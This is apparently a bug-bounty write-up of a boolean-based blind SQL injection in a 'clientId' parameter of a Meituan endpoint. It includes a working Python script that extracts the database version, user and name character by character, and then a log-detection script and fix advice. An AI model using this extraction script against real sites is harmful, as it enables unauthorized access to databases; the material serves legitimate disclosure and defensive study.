RANK 24
Coins 24
Equivalent to RMB 240
Same root cause as the previous vulnerability, so only 24.
Request:
GET /check?clientId=64915 HTTP/1.1
Host: xxx.meituan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: */*
Cookie:XX
Connection: close
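The clientId parameter has a boolean-based injection. sqlmap could not extract any data, so I wrote a script to verify it.
Script
As usual, anything in the code that could leak the location of the vulnerability has been removed or masked. It is very fresh and has not been fixed yet.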
```python
#! /usr/bin/env python3
# Date   : 1/5 16:04
# Comment: no comment


import requests

raw_url = "xxx"      # redacted by the author
burp0_cookies = {}   # {xxx} in the original: redacted by the author
burp0_headers = {}   # {xxx} in the original: redacted by the author


def get_version():
    # Guess version() one character at a time; the response contains "true" on a match.
    version = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(version()," + str(i) + ",1))=" + str(j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception as e:
                continue
            if "true" in res.text:
                version += chr(j)
                break
    print('version:', version)


def get_user():
    # Same loop for user().
    user = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(user()," + str(i) + ",1))=" + str(j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception as e:
                continue
            if "true" in res.text:
                user += chr(j)
                break
    print('user:', user)


def get_db():
    # Same loop for database().
    current_db = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(database()," + str(i) + ",1))=" + str(j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception as e:
                continue
            if "true" in res.text:
                current_db += chr(j)
                break
    print('current_db:', current_db)


get_version()
get_db()
get_user()
```
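When sqlmap gets nothing, that is, the scanner flags the issue first, sqlmap cannot confirm it, and yet the injection really is there, you can write a script to verify it. That is one way to approach it.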
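Seen from the server side, this kind of character-by-character guessing leaves a distinctive trail in access logs: one client sending many `clientId` values that differ only in position and ASCII code. The following detection sketch is an added example, not part of the original post; it assumes combined-format access logs, and the function names, the threshold and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Probe shape used by the script above: ascii(mid(<func>(),<pos>,1))=<code>
PROBE = re.compile(
    r"ascii\s*\(\s*mid\s*\(\s*(\w+\(\))\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)
# Assumed log layout: combined log format (client IP first, request line quoted).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) ')

def normalize(value):
    """Replace inline SQL comments (/**/ used as spaces) and collapse whitespace."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", value)).strip()

def find_blind_sqli(lines, param="clientId", min_guesses=3):
    """Map (client IP, probed function) -> character positions probed, for clients
    that sent at least `min_guesses` distinct character guesses through `param`."""
    guesses = defaultdict(set)  # (ip, func) -> {(position, ascii code)}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = parse_qs(urlsplit(target).query)  # also percent-decodes values
        for value in query.get(param, []):
            if value.isdigit():
                continue  # a well-formed numeric id
            hit = PROBE.search(normalize(value))
            if hit:
                func, pos, code = hit.groups()
                guesses[(ip, func.lower())].add((int(pos), int(code)))
    return {key: sorted({pos for pos, _ in seen})
            for key, seen in guesses.items() if len(seen) >= min_guesses}

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2024:10:00:00 +0000] "GET /check?clientId=64915 HTTP/1.1" 200 4',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /check?clientId=54915%27/**/or/**/ascii(mid(version(),1,1))=52 HTTP/1.1" 200 5',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /check?clientId=54915%27/**/or/**/ascii(mid(version(),1,1))=53 HTTP/1.1" 200 4',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /check?clientId=54915%27/**/or/**/ascii(mid(version(),2,1))=46 HTTP/1.1" 200 4',
    '192.0.2.9 - - [01/Jan/2024:10:00:04 +0000] "GET /check?clientId=54915%27/**/or/**/ascii(mid(user(),1,1))=114 HTTP/1.1" 200 5',
]

if __name__ == "__main__":
    for (ip, func), positions in find_blind_sqli(SAMPLE_LOG).items():
        print(f"{ip} brute-forced {func} at positions {positions}")
```

Detection only tells you the probing happened; the fix for the endpoint itself is to accept only numeric `clientId` values and bind the parameter in the query instead of concatenating it.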